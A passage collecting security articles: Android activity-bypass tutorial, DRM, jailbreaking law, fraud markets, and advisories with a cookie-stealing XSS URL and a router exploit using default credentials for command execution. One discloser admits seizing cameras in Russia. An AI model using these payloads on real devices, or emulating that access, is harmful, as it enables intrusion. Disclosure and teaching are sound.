are the two common scenarios I can imagine with Smart Lock use. The user could be wearing an Android 5.0 smartwatch, and have their Android 5.0 phone or tablet in their purse or their pocket. Or, the user could be in their car that has Android Auto (Android 5.0 in a car’s embedded system), and it unlocks their Android 5.0 phone or tablet. Discoverable mode can be on only when the Smart Lock devices authenticate each other, but Bluetooth will need to stay turned on for both devices for the duration of Smart Lock use. But it may be a hassle for the user to have discoverability turned off, just in case the user’s two devices need to reconnect after disconnecting for whatever reason. Oops! That’s an opportunity for an attacker. I really hope that Smart Lock only uses Bluetooth 4.1, because so many more vulnerabilities are known for all previous versions of Bluetooth. I imagine more successful 4.1 attacks will exploit zero-day vulnerabilities. It’s much more difficult for an attacker to find a zero-day. It would be great if Smart Lock requires both devices to switch their master and slave roles frequently, because an attacker will need to focus on the slave for a man-in-the-middle attack. All passkeys that Smart Lock uses should be at least eight digits long. Obviously, the longer the better. Google’s servers that operate the Smart Lock feature should change a user’s link keys as frequently as possible. When Google releases technical documentation for how Smart Lock uses Bluetooth, we’ll get a better idea as to if they take security seriously. I hope that Google has penetration tested the feature thoroughly. But I won’t be at all surprised if I hear about a successful Smart Lock attack technique at next year’s Defcon. I personally won’t ever use the feature myself, even though I’ll have at least a couple of Android 5.0 Lollipop devices of my own in the next few months. I see this as yet another situtation where making a system more user friendly renders it less secure. References Adventures in Automotive Networks and Control Units- Charlie Miller and Chris Valasek http://illmatics.com/car_hacking.pdf Bluetooth Security- NSA https://www.nsa.gov/ia/_files/factsheets/i732-016r-07.pdf Android 5.0 Lollipop Official Website Android - 5.0 Lollipop Bluetooth Connectivity Threatens Your Security- Aaron Stern, Kaspersky Blog Bluetooth Security Vulnerabilities -Kaspersky Daily | Kaspersky Lab Official Blog A man-in-the-middle attack using Bluetooth- Eric Gauthier, Security Science A Man-In-The-Middle Attack Using Bluetooth - Technology, Innovation, Internet and Security Science Top 5 Bluetooth Hacking Tools- Hack Yogi Top 5 Bluetooth Hacking Tools- Ethical Hacking Guide New Chrome feature will allow users to unlock a computer with a smartphone- Conner Forrest, Tech Republic New Chrome feature will allow users to unlock a computer with a smartphone - TechRepublic Security- Bluetooth Developer Portal https://developer.bluetooth.org/TechnologyOverview/Pages/Security.aspx Source

Mobile Application Security is one of the hottest segments in the security world, as security is really a big concern with growing mobile applications. In this article, we will go through the attacks associated with Android application components. What are Android Application Components? Application components are essential building blocks of an Android App. Every app is built as a combination of some or all of those components, which can be invoked individually. There are four main components in Android, which are explained below. Activity: An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc. Example: Login screen of your Facebook app. Service: A Service can perform long-running operations in the background and does not provide a user interface. Example: Playing Music Content Providers: A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process. Example: Using content providers, any app can read SMS from inbuilt SMS app’s repository in our device. *READ_SMS permission must be declared in the app’s AndroidManifest.xml file in order to access SMS app’s data. Broadcast Receivers: A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug etc. Though most of the broadcast receivers are originated by the system, applications can also announce broadcasts. This article focuses on demonstrating the methodology to attack and secure vulnerable Activity components of applications. As shown in the figure below, this app has two activities. The first activity takes a password as input. If the user enters the correct password he will be landed in a page which says “Private Area”, otherwise he will get a “Wrong password” message. For test purposes, the password to login is set as “password”. Ideally, the first screen should use an intent and invoke the second screen if a valid password is entered. We need to perform black box testing on this app to see if we can bypass the authentication by directly invoking the welcome screen. Prerequisites to follow the steps Computer with Android SDK Installed A Non Rooted mobile device to install the app. Topics Involved: Information gathering Attacking Vulnerable Activity Components Securing the applications Information gathering Decompile the app with APK tool. Analyze AndroidManifest.xml file for exported Activity components. Every Android App has a package name and every Activity has its own Class name inside the package. The initial steps are to find out the name of the package and names of the available sensitive activities. Though there are other methods to get this information, looking at the AndroidManifest.xml is a good approach. We can get the AndroidManifest.xml file by decompiling the application using APKTOOL. Download APKTOOL from the link below. https://code.google.com/p/android-apktool/downloads/list Place the test application in the same folder as in APKTOOL. Now, decompile the APK file using the following command as shown in the figure: apktool d testapp.apk As shown in the figure below, we should now be able to see a new folder named “testapp” with the AndroidManifest.xml file inside it. Now, we need to search for the package name and its activities. All the activities will be registered in AndroidManifest.xml file using <activity></activity> tags. So, anything inside these tags will be an activity. Looking at the AndroidManifest.xml file, we are able to see two Activity Components and the package name as shown in the figure below. By examining the above figure, it is clear that we got the following information about the app. com.isi.testapp is the name of the package. com.isi.testapp.Welcome could be the activity we are getting after providing the correct password. Attacking Vulnerable Activity Components Our job now is to launch Welcome activity without providing any password in the first screen. We can perform attacks on vulnerable activity components in several ways, as mentioned below. Launching sensitive Activities with Activity Manager Tool. Using a Malicious App to invoke Activities of other apps. We can also use Mercury framework for performing these attacks, which will be covered in later articles. Launching sensitive activities with Activity manager tool Activity Manager is a tool that comes preinstalled with Android SDK and can be used along with “adb shell”. This tool can be used to launch Activities and Services of an application. We can even pass intents using it. So, let’s begin. Connect the device to the computer and get a shell on the device using the following command: adb shell Type in the following command to launch the Welcome activity: am start –n com.isi.testapp/.Welcome We should now see the welcome screen fired up without providing the password. Using a Malicious App to invoke Activities of other apps Another way of invoking other application’s activities is to write a malicious app and feed it with the name of the package and activity to be launched. The figure below is a code snippet to launch an activity where in com.isi.testapp.Welcome is the activity to be launched. In our case, the malicious app doesn’t require any permission to launch the “Welcome” activity of the vulnerable app. Using Mercury framework The same attack can be reproduced with Mercury framework. We will discuss Mercury framework later in this series. Securing the application components Setting android:exported attribute’s value to false In the AndroidManifest.xml file of our application, we should add the following attribute to the application component to be secured. In our case com.isi.testapp.Welcome is the activity to be secured. The above code restricts other applications or any system component other than the current app from accessing this Activity. Only applications that have the same user id as the current app will be able to access this Activity. Limiting access with custom permissions The android:exported attribute is not the only way to limit an activity’s exposure to other applications. We can also impose permission-based restrictions by defining custom permissions for an activity. This is helpful if the developer wants to limit the access to his app’s components to those apps which have permissions. Note: The above security controls are applicable to any other Application component which we discussed in the beginning of the article. References: App Components | Android Developers Part: 2 / 3 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 Android Hacking and Security, Part 2: Content Provider Leakage - InfoSec Institute Android Hacking and Security, Part 3: Exploiting Broadcast Receivers - InfoSec Institute Android Hacking and Security, Part 4: Exploiting Unintended Data Leakage (Side Channel Data Leakage) - InfoSec Institute Android Hacking and Security, Part 5: Debugging Java Applications Using JDB - InfoSec Institute Android Hacking and Security, Part 6: Exploiting Debuggable Android Applications - InfoSec Institute Android Hacking and Security, Part 7: Attacks on Android WebViews - InfoSec Institute Android Hacking and Security, Part 8: Root Detection and Evasion - InfoSec Institute Android Hacking and Security, Part 9: Insecure Local Storage: Shared Preferences - InfoSec Institute Android Hacking and Security, Part 10: Insecure Local Storage - InfoSec Institute Android Hacking and Security, Part 11: Blackbox Assessments with Introspy - InfoSec Institute Android Hacking and Security, Part 12: Securing Shared Preferences with Third Party Libraries - InfoSec Institute Android Hacking and Security, Part 13: Introduction to Drozer - InfoSec Institute Android Hacking and Security, Part 14: Examining Android App Specific Data on Non-Rooted Devices - InfoSec Institute Android Hacking and Security, Part 15: Hacking Android Apps Using Backup Techniques - InfoSec Institute Android Hacking and Security, Part 16: Broken Cryptography - InfoSec Institute

Partea I : https://rstforums.com/forum/93619-fascinating-story-drm-part-one-wario-s-woes-when-i-little-girl-i-lov.rst daca tot a postat prima parte am zis sa continui cu aceasta "serie". =================================================================== In my last piece, I explained how Nintendo’s experiences with piracy and copy protection helped shape the current video game industry, where Sony has been a major player for nearly twenty years now. Technologies like the 10NES lock-out chip didn’t just help Nintendo and authorized thirdparty developers, they also benefitted consumers. Take my word for it, unlicensed NES games were really awful. If you won’t, install an NES emulator on your PC, smartphone, or tablet, and torrent a ROM for Sunday Funday, or Myriad 6-in-1. That’ll be minutes of your life that you’ll never get back, and you don’t want to punch a hole through your monitor. But more recent DRM developments with multibillion dollar publishers like EA and Activision have been very unfriendly to consumers. I can empathize with wanting to make it difficult to play pirated copies of games that often cost more than $20 million to develop. But when people who actually spent $60 on their legitimate physical or digital copy of their game can’t play it either, that spells trouble for quarterly earnings reports. Always On Your Nerves Steam, an online PC gaming and retail platform launched by Valve in 2003, took the industry by storm. Not only does the service allow PC gamers to play online in multiplayer mode, it also retails games from most major PC game publishers and a multitude of independent PC game developers. Game developers and publishers like how Steam handles DRM. They have the option to use their own DRM software, Valve’s, or none at all. Valve doesn’t publicly release sales information. But knowing that they have over 100 million active users, and roughly 70% of the online PC game sales market, it’s safe to assume that they make over a billion per year. One of the biggest game publishers in the world, Electronic Arts, wanted a piece of the action for themselves. Piracy really worries big corporations like EA, and it’s nice to get the retailer portion of game sales revenue in addition to the portion that publishers usually get. So, EA launched a similar service exclusively for games they publish, Origin. Origin launched for Windows on June 3rd, 2011, and for Mac OS X on February 8th, 2013. When the first SimCity game debuted in 1989, it initiated a craze for simulation genre PC games that lasted throughout the 1990s. Game designer Will Wright cofounded Maxis to publish his game. When Wright was developing Raid On Bungeling Bay for Broderbund in the mid-1980s, he found the map creation process to be a lot of fun. SimCity was inspired by that, and may have even used some of the same code. Maxis developed and published a number of other simulation titles in the wake of SimCity’s commercial success, such as SimAnt, SimTower, SimHospital, and SimCity 2000. Other developers created competing games, many of which with “Tycoon” in the title. Wright and Maxis’ success led EA to acquire Maxis in 1997. That was a good idea, because when The Sims was released in 2000, it quickly became one of the most profitable PC games of all time. After a third SimCity game, and lots of expansion packs for The Sims, SimCity 4 was released in January 2003. That was a smart move by EA, because by the end of the year, SimCity 4 was the seventh best selling PC game. Four of the top six were expansion packs for The Sims. It took about a decade, but a fifth SimCity game launched in March 2013, named simply SimCity. (The 1989 SimCity game was renamed SimCity Classic years ago.) I was disappointed by the smaller map sizes for cities. But I was even more disappointed that unless one found a way to crack the game accordingly, game saves could not be written on local HDDs. Nope, games could only be saved on EA’s servers. Also, one always must be connected to EA’s servers in order to play… even for singleplayer mode. Argh… SimCity (2013) screenshot, courtesy of Wired.com I never bought the game. No, I never tried pirating it, either. Friends would tell me how cool it was that a new SimCity game was out, and that they wanted to buy it. “I don’t recommend it,” I’d tell them. It wasn’t just that players are forced to be “always online.” It wasn’t just the small map sizes, and dumbed down, I mean “casual-friendly” game mechanics. Nope. People who legitimately bought SimCity and tried to play it couldn’t play the game at all. The servers for EA’s Origin couldn’t handle the traffic from such a popular new PC game that demands constant connectivity. EA’s PR said that SimCity was designed to always be online in order to enhance users’ fun with social functionality. I doubt it. SimCity was designed that way for DRM, in order to combat piracy. But there’s got to be ways to use Origin servers for DRM that don’t require constant connectivity. And not being able to save games on one’s local disk is terrible. Throughout 2014, SimCity has worked a lot better thanks to additional Origin server capacity and patches. But I’d still never buy that particular game. They should have learned from what happened to Activision/Blizzard in 2012. Blizzard merged with Activision in 2008. Blizzard is most famous for the World of Warcraft MMO, and South Korea’s most popular spectator sport, Starcraft. But their action RPG series, Diablo, is tremendously popular as well. Blizzard’s online multiplayer gaming service, Battle.net, debuted for the first Diablo game, in 1997. With over seventeen years of Battle.net, plus experience with managing the world’s most popular MMO (WoW, of course) for over a decade, it’s safe to assume that no corporation knows running online PC gaming better than Activision/Blizzard, except perhaps for Valve with Steam. When the Windows and Mac OS X versions of Diablo III launched in 2012, gamers were really hungry for it, because Diablo II was released all the way back in 2000. But like SimCity afterward, Diablo III requires players to always be online, even for single-player games. Diablo III screenshot, courtesy of Ubergizmo In the 2012 launch, quite often people who legitimately purchased the game couldn’t even connect to Battle.net for a single-player session. During other times, even many months after the game debuted, the movement and progression in the game would be frustratingly slow and choppy, even after a successful connection. Months after launch, and many patches later, a representative of Blizzard said, “We do not have plans to implement an offline mode. While the always-online requirement made the auction house possible, the auction house was never the driving factor in our decision to make the PC version of Diablo III require an Internet connection. The game was built from the ground up to take full advantage of Battle.net, which provides a number of important benefits, including persistent server-side character saves, a seamless PC multiplayer experience, cheat prevention, and Real ID and BattleTag social features.” I don’t need any damn “seamless multiplayer experience” if I’m only ever going to be playing in single-player mode, Blizzard. Why don’t they just flat out admit that their “always online” is a DRM mechanism? Earlier this year, Diablo III: Ultimate Evil Edition came out for seventh generation consoles (PS3 and Xbox 360), and eighth generation consoles (PS4 and Xbox One). There haven’t been any significant problems with that version of the game. Pretty soon, I’ll buy it for my PS4. I like PC gaming as much as I like console gaming, but when I spend my hard earned cash, it’ll be on the version that operates the most smoothly. By never pre-ordering games, and by buying games with the fewest bugs, I’m doing what I can to send game developers and publishers an important message. Hopefully, AAA developers will give up the always online DRM trend, and at the very least, implement a lot more consumer-friendly DRM if it’s absolutely necessary to have DRM at all. I prefer to spend the majority of my gaming time fighting AI only, so I also want to see more of a single-player focus in big budget games, however old school that may seem. It doesn’t usually occur to people, but the DRM in games and applications is an information security issue, even when there are no attacks involved. Remember the CIA triad- confidentiality, integrity, and availability. DRM may focus on integrity, in that it tries to prevent technical changes made to software that allow for piracy. But people also forget about availability. If I purchase a game or application, it should be available for me to enjoy. If developers ignore that, they’ll do so at their peril. The story of DRM is a fascinating one. And the issues with it don’t always pertain to video games. There have been significant DRM issues with utility and content creation applications, as well. In my next article, I’ll focus on Microsoft and Adobe. References SimCity Blackout Is Just One More DRM Disaster- Chris Kohler, Wired SimCity Blackout Is Just One More DRM Disaster | WIRED SimCity Review In Progress- IGN SimCity Review in Progress - IGN SimCity updates to 1.8, get your patch notes here- Tim Colwill, games.on.net SimCity updates to 1.8, get your patch notes here | games.on.net Top Selling PC and Console Games of 2003 Game Sales Charts - Top Selling PC and Console Games of 2003 Diablo III Fans Should Stay Angry About Always-Online DRM- Erik Kain, Forbes http://www.forbes.com/sites/erikkain/2012/05/17/diablo-iii-fans-should-stay-angry-about-alwaysonline-drm/ Diablo 3 to remain always-online, despite planned auction house closures- Phil Savage, PCGamer Diablo 3 to remain always-online, despite planned auction house closures - PC Gamer In The End, Diablo III Just Shouldn’t Have Been ‘Always Online’- Kirk Hamilton, Kotaku In The End, ?Diablo III Just Shouldn't Have Been 'Always Online' Error 3003 in Diablo 3 is the hottest error at the moment- Edwin Kee, Ubergizmo Error 3003 in Diablo 3 is the hottest error at the moment | Ubergizmo Source

1. Introduction The term “jailbreaking” refers to circumventing security measures of a mobile operating system with the aim to install unauthorized software. The term originates from the very first hacks on iPhones. The purpose of these hacks was to break the jailed environment of iPhones, which imposed restrictions on what resources were accessible. The tools used for jailbreaking include, but are not limited to, Spirit Jailbreak, Redsn0w iDemocracy, iActivator, iNdependence, and iFunstastic. With some of these tools, jailbreaking requires only clicking a few buttons and setting the iPhone into DFU (Device Firmware Upgrade) mode. Nevertheless, the jailbreaking tools perform multiple complex operations that are known only by certain information security experts. The term “jailbreaking” should not be confused with “unlocking”. The latter refers to freeing a mobile phone to work with a mobile operator different than the mobile operator chosen by the manufacturer of the mobile phone. However, both jailbreaking and unlocking constitute unauthorized modification of a mobile operating system. Fig.1 illustrates the relationships between these three concepts. Fig. 1: Relationships between unauthorized modification of a mobile operating system, jailbreaking, and unlocking People jailbreak their mobile phones in order to install various software, e.g. apps excluded by manufacturers and solutions to security vulnerabilities. Although jailbreaking can provide the user with the freedom to install whatever software he/she wants, jailbreaking may have legal implications. The purpose of this article is to examine the legality of jailbreaking in the United States (Section 2) as well as the legal risks associated with jailbreaking (Section 3). Next, this article discusses the future of the regulation of jailbreaking (Section 4). Finally, a conclusion is drawn (Section 5). 2. Legality of jailbreaking in the United States The US Digital Millennium Copyright Act (DMCA) prohibits the circumvention of digital rights management schemes. While this prohibition was adopted with the aim to stop piracy, it can also be used to stop competitors who would like to create software for locked mobile operating systems. The term “locked mobile operating systems” refers to mobile operating systems that do not allow execution of software which is not approved by certain companies. Probably because of the negative effect of digital rights management schemes on consumer choice and competition, the Librarian of Congress decided to grant exemptions from the requirements of DMCA. The latest exemption related to jailbreaking became effective on October 28th, 2012. The exemption, which will be in force for a period of three years, legalizes jailbreaking. In November 2014, the Electronic Frontier Foundation (EFF) submitted a petition to the Librarian requesting the Librarian to “renew and expand the exemption for jailbreaking.” In the petition, the EFF argued that jailbreaking is used for lawful and useful activities. For example, the EFF stated that jailbreaking could be used to circumvent the restrictions built into Android which block software programs aiming to prevent leakage of personal information by other applications. If the Librarian does not renew the exemption for jailbreaking, jailbreaking will become a crime. It is worth mentioning that, in 2013, the Librarian did not renew the exemption for unlocking and, as a result, unlocking became punishable with a fine of up to USD 500,000 and/or up to 5 years imprisonment. However, in 2014, President Obama signed the Unlocking Consumer Choice and Wireless Competition Act, which made it illegal for people to unlock their cellphones. The Act will expire in 2015. It should be noted that, while jailbreaking is currently legal in the United States, it may violate the End-User License Agreement (EULA) concluded between the seller and the buyer of a mobile phone. In this regard, Apple Support Document HT201954 states: In the document, Apple also states that jailbreaking can lead to numerous issues to the hacked phone touch, including security vulnerabilities, disruption of services, shortened battery life, unreliable voice and data, and instability. Despite such warnings, pursuant to the Federal Trade Commission’s Magnuson-Moss Warranty Act of 1975, a seller of mobile phones cannot void the warranty, unless it can prove that the technical problem is linked to the installation of an after-market item (e.g. unauthorized software applications). 3. Legal risks associated with jailbreaking According to the latest exemption published by the Librarian, the following computer programs shall be exempt from the prohibition against circumvention of technological measures: This exemption does not apply to tablets. In relation to tablets, the Librarian stated that, because of the lack of a sufficient basis to develop an appropriate definition for tablet, the terms fall outside of the scope of the exemption. Also, the exemption does not apply to cases when jailbreaking is performed with the aim to install pirated software applications. In such cases, the violators would be liable not only for unlawful use of copyrighted material, but also for circumvention of digital rights management schemes. Thus, jailbreaking alone may not be illegal, but in a combination with a copyright violation, it may become a crime. It should be noted that some jailbreaking software is provided without EULA. Such jailbreaking software has to be installed by the user on a personal computer. Afterwards, the installed jailbreaking software will connect to the mobile phone and install an app on it. Pursuant to the Berne Convention, an international intellectual property agreement applicable in 168 countries, software is automatically copyrighted at the time of creation. By using, without permission, copyrighted jailbreaking software in order to execute copyrighted jailbreaking mobile phone applications, the users of the software will infringe the copyright law and unlawfully circumvent digital rights management schemes. While the developers of jailbreaking software may never assert their copyrights in their software, such a possibility theoretically exists. The developers of jailbreaking software can even program their software in such a way as to provide them with location information about the users of the software. There are cases when unlawful users of copyrighted software receive letters from the copyright holders stating that the copyrighted software automatically provided the copyright holders with the location data of the infringers. In order to avoid legal problems, users of jailbreaking software need to ensure that they are entitled to use those applications. This can be done by looking at the EULA of the jailbreaking software. The EULA needs to state the ways in which a copy of the software can be used. If the jailbreaking software does not contain EULA, it is advisable that the users do not use the software. This is because the lack of EULA will lead to a lack of clarity as to the copyright status of the software. 4. The future of the regulation of jailbreaking The acts of the Librarian of Congress and laws, such as Unlocking Consumer Choice and Wireless Competition Act, clearly indicate the willingness of the government to legalize unauthorized modification of mobile phone operation systems (including jailbreaking). This willingness is a reflection of the opinion of a large number of American people. In this regard, it is worth noting that the Unlocking Consumer Choice and Wireless Competition Act was a response to an official online petition, which collected more than 100,000 signatures in favor of the legalization of unlocking. The White House advisor Jeff Zients called the Act an Jaibreaking is currently temporary legalized. In 2015, the Librarian of Congress will have to decide whether it should continue to renew the exemption. Irrespective of whether this happens, a larger reform of the copyright law will be needed in order to ensure that the users of mobile phones will not be surprised one day by the news that the exemption provided by the Librarian expired. Such a surprise appeared in 2012, when the Librarian did not renew the exemption for unlocking. 5. Conclusions This article has shown that jailbreaking is currently legal in the United States. However, it may be a risky activity because some of the jailbreaking software is provided without EULA. Users installing jailbreaking software without EULA may not only be prosecuted for unauthorized use of copyrighted materials, but also for unlawfully circumventing digital rights management schemes. It is risky to assume that because software is available for download, one has certain rights in relation to the software. A solution to this problem is to oblige the creators of jailbreaking software to add EULA to their software. The solution can be implemented in a future law related to jailbreaking. In order to provide American people with certainty in relation to the legality of jailbreaking, such a law should not only permit jailbreaking, but also ensure that it will be legal for a period longer than three years. Otherwise, as the EFF pointed out, the Source

Credit card frauds are very common these days – today a data breach occurs in retailer’s shop, online shopping site or banking site and at the next moment millions of cards appears in the underground black market – how simple is that for cyber criminals nowadays. But imagine if there is no possible way to hack credit cards and ID cards. Seems like next to impossible, but quantum cryptography ensures that stealing people's personal data will soon be very difficult for hackers and cyber thieves due to an extra layer of verification. SECURE FRAUD-PROOF CREDIT CARDS The research at the University of Twente in Enschede, Netherlands has suggested that "fraud-proof" credit cards are possible to develop using Quantum Physics that will protect users’ financial and personal information from hackers. Security researchers describe this extra layer of verification as Quantum-Secure Authentication (QSA) of a "classical multiple-scattering key." With the help of QSA method, people will be able to create a physical "key" which is impossible to copy or create similar ones. So, this new technology will not allow any person to copy someone’s credit card and can validate the identity of any person or object, including debit and credit cards, even if the most important data has been stolen, the Optical Society reported in the Dec. 15, 2014 edition of the journal Optica. However, Chip-and-Pin payment cards are opted by the major organisations to promote additional security solutions like tokenization and point-to-point encryption. Chip technology generates a unique code for every transaction, making it nearly impossible for criminals to use the card for counterfeit fraud. But we have also seen that the latest "Chip-and-PIN" technology are vulnerable to Card Cloning. HOW QSA TECHNOLOGY WORKS Now, the important thing to note is that how is it possible and how Quantum Physics works with the Credit card technology ?? This innovative technology depends on two unique quantum properties of light to create a secure and unique Question-and-Answer (Q&A) exchange that cannot be 'spoofed' or copied. As a single photon of light can occupy more than one location at the same time and because light has so many separate wavelengths that hacking a credit card would take centuries to find the right combination. The "quantum credit cards" would be more secure and fraud-proof because QSA technology leverages the immutable properties of quantum mechanics to create a perfectly secure encryption system, instead of any mathematical interpretation. EASY TO IMPLEMENT AND HARD TO BREAK According to Pepijn Pinkse, such a security layer would be "straightforward to implement with current technology," used by credit cards. Quantum credit cards would be outfitted with a strip of white paint containing millions of nanoparticles. Researchers could project individual photons of light onto this paint with the help of a laser that would bounce around the nanoparticles as if in a pinball machine before escaping back to the surface and forming a unique pattern. This new technology could help in protecting government buildings, personal bank and credit cards, and even vehicles, according to the research. Source

Two of Cisco’s products are vulnerable to the POODLE attack via the TLS implementation in those products. The vulnerability affects Cisco’s Adaptive Security Appliance software and its Application Control Engine module. The POODLE attack was disclosed in October by researchers from Google, who discovered that if an attacker can force a vulnerable Web server to fall back from a modern cryptographic protocol such as TLS to an older one such as SSLv3, under some circumstances he can then decrypt the secure connection. Originally, researchers believed that the attack was only effective against SSLv3, but last week Adam Langley from Google said that it also affected some implementations of TLS. Langley discovered that appliances from F5 Networks and A10 Networks both were vulnerable to the POODLE attack on TLS and notified the vendors. He said at the time that he didn’t think he had identified every vulnerable implementation. Cisco on Monday said that some of its products also are vulnerable. “A vulnerability in certain implementations of the TLSv1 protocol could allow an unauthenticated, remote attacker to access sensitive information,” the Cisco advisory says. “The vulnerability is due to improper block cipher padding implemented in TLSv1 when using Cipher Block Chaining (CBC) mode. An attacker could exploit the vulnerability to perform an ‘oracle padding’ side channel attack on the cryptographic message. A successful exploit could allow the attacker to access sensitive information.” Cisco did not say in its advisory whether there is a patch available to address the vulnerability in its products. Source

Underground hacker markets are peddling complete kits to create new identities, elevating in-person fraud scams a tier closer to credit card theft and fraud. Researchers at Dell SecureWorks released an update to 2013 research on black hat markets, noticing a number of noteworthy trends beyond the theft of personal credentials such as passports, driver’s licenses, working Social Security numbers and even utility bills as a second form of authentication. Hacking and crimeware services, for example, continue to mimic legitimate business practices by not only selling services, but also tutorials, notably how-tos on cashing out credit cards, bank transfers, basic carding, basic phishing and many more, Dell SecureWorks researchers Joe Stewart and David Shear wrote in their report. Criminal gangs are also marketing their services, differentiating themselves based on respective service levels and guarantees on stolen data. “It is apparent that the underground hackers are monetizing every piece of data they can steal or buy and are continually adding services so other scammers can successfully carry out online and in-person fraud,” the report said. That doesn’t mean criminals operating online have abandoned the long-profitable stolen credit card as a revenue stream. Premium cards, including fullz, have gone up in price on average of $5 from 2013, selling at about $30; fullz is hacker slang for a full collection of stolen credentials, including name, address, phone number, email addresses, dates of birth, Social Security numbers, bank account numbers, credit card numbers and banking credentials. While the price of individual credit card numbers remains flat or dropped from last year, the price for fullz on a U.S. victims is up to $30, while U.K, Australia, Canada, EU and Asia fullz are up to as high as $45 per record. Premium Master Card and Visa cards that work worldwide and include Track 1 and 2 data are selling for $35 and $23 respectively, Dell SecureWorks said. Premium cards are classified Black, Platinum, Gold and others by credit card companies. Dell researchers said the number of data breaches has made cards plentiful on the underground, yet prices have not deflated, in particular for non-U.S. cards. One underground site, Dell SecureWorks said, claimed to possess 14 million U.S. cards, 294,000 from Brazil and 342,000 from around the world. While online fraud remains a constant, the inclusion of identity kits, Dell SecureWorks said, are being used for in-person scams, including loan applications, check fraud and more. A new identity, which includes a scan of a working Social Security card, name and address nets $250 undergound—the valid utility bill will cost you an extra $100, Dell SecureWorks said. A counterfeit non-US passport, meanwhile, can fetch as much as $500. Training tutorials, on the other hand, run the gamut from basic instruction on selling stolen credit cards to others on running exploit kits, spam, phishing and DDoS campaigns. “These tutorials not only explain what a Crypter, Remote Access Trojan (RAT) and exploit kit is but also how they are used, which are the most popular, and what hackers should pay for these hacker tools,” the report said. Many of these services also come with “satisfaction guarantees,” Shear and Stewart said. Carders are offering in some cases 100 percent guarantees stolen cards are still valid and have not been canceled. “All dead ones will be replaced,” the report quotes the site. Malware continues to sell well in the underground, Dell SecureWorks said. Remote access Trojans are selling for less than last year, however, ranging from $20 to $50 for notorious RATS such as DarkComet, down considerable from as high as $250 a year ago. A number of free RATs have flooded the market, Dell SecureWorks said, deflating prices. “Hackers are looking for a RAT that is easily available for purchase or to use for free and which they can run through a Crypter (a program which encrypts malware, making it FUD or fully undetectable to Anti-Virus and Anti-Malware programs),” the report said. As for exploit kits, Nuclear and Sweet Orange seem to fetch the best prices with Sweet Orange going for $450 for a weekly lease to as high as $1,800 for a month. Source

Hello list! There are Brute Force and Cross-Site Scripting vulnerabilities in D-Link DCS-2103 (IP camera). If previous Path Traversal and Full path disclosure vulnerabilities were post-auth, then these BF and XSS vulnerabilities are pre-auth. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. For BF vulnerability version 1.20 and previous versions are vulnerable. Developers refused to fix BF vulnerability (they think that it's problem of a user to have strong password) and XSS vulnerability was fixed in firmware version 1.20. ---------- Details: ---------- Brute Force (WASC-11): http://site No protection from BF attacks. Cross-Site Scripting (WASC-08): http://site/vb.htm?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E ------------ Timeline: ------------ 2014.05.22-2014.11.26 - conversation with D-Link about vulnerabilities in DAP-1360. 2014.08.01 - announced at my site about vulnerabilities in DCS-2103. 2014.11.14-2014.12.13 - conversation with D-Link about vulnerabilities in DCS-2103. 2014.12.16 - disclosed at my site (http://websecurity.com.ua/7288/). I found this and other web cameras during summer to watch terrorists activities in Donetsk and Lugansks regions of Ukraine (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html) and also I took under control web cameras in Russia (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-December/009065.html). Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua Source

#################################################################### # # Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution # Date: 2014/12/10 # Exploit Author: Chako # Vendor Homepage: https://www.ciktel.com/ # #################################################################### Description: CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie and can lead to Command Execution. Exploit: 1) Login as a normal user Default Username: User Password:cikvoip 2) change URL to http://URL/adm/system_command.asp and now u can run commands. Example: Command: ls /etc_rw/web Result: internet cgi-bin homemode_conf.asp menu-en.swf wireless md5.js hotelmode_conf.asp waitAndReboot.asp graphics menu.swf getMac.asp quickconfig.asp javascript firewall home.asp customermode_conf.asp wait.asp station login.asp main.css overview.asp style voip lang wps usb adm Source

Document Title: =============== iUSB v1.2 iOS - Arbitrary Code Execution Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1374 Release Date: ============= 2014-12-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1374 Common Vulnerability Scoring System: ==================================== 8.7 Product & Service Introduction: =============================== This is very useful software for iDevices users, it lets you share all types of files easily and quickly via wifi. The main functions of iUSB. Share files directly to iDevices via wifi. Share files via wifi using a web browser to the device or computer. Share files via cable to a computer. Manage files and folders easily and efficiently. Allows to open almost common files with formats: MP3, MP4, M4V, MOV, XLS, KEY.ZIP, NUMBERS.ZIP, PAGES.ZIP, PDF, PPT, DOC, RTF, RTFD.ZIP, KEY, NUMBERS, PAGES, TXT, CSV, HTML, HTM. Support for secure your data simply and quickly. (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/iusb/id903716126 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered an arbitrary code execution vulnerability in the official iUSB v1.2 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Trung Pham Product: iUSB - Mobile Web Application (Wifi) 1.2 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A code execution vulnerability has been discovered in the official iUSB v1.2 iOS mobile web-application. The issue allows remote attackers to execute arbitrary codes to compromise the mobile wifi web-application. The issue is located in the `path` value of the `create folder` input field. Remote attackers with access to the wifi web interface are able to execute system specific codes by usage of the vulnerable `create folder` function. The execution of the injected code occurs on the application in the iUSB wifi interface index item listing module. The attack vector is located on the application-side of the app and the request method to execute the code is POST. The security risk of the code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. Exploitation of the code execution vulnerability requires no privileged application user account or user interaction. Successful exploitation of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] Create Folder Vulnerable Parameter(s): [+] path Affected Module(s): [+] iUSB File Dir Listing Proof of Concept (PoC): ======================= The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction. 